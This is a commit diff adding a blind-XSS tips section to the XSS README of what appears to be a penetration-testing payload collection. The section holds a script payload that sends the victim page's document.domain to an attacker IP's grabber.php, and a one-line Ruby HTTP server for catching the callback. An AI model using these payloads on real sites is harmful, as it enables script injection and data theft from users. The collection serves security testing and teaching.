Merge pull request #376 from noraj/patch-2

XSS: add quick tips for bXSS
2024-12-19 19:06:12 +00:00 · 2021-06-16 13:56:29 +02:00 · 2021-06-16 13:56:29 +02:00 · 62b897c936
commit 62b897c936
parent 2a4631eb8f c469236204
1 changed files with 16 additions and 0 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -452,6 +452,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - Comment Box
  - Administrative Panel

+### Tips
+
+You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
+
+Eg. payload
+
+```html
+<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
+```
+
+Eg. one-line HTTP server:
+
+```
+$ ruby -run -ehttpd . -p8080
+```
+
 ## Mutated XSS

 Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.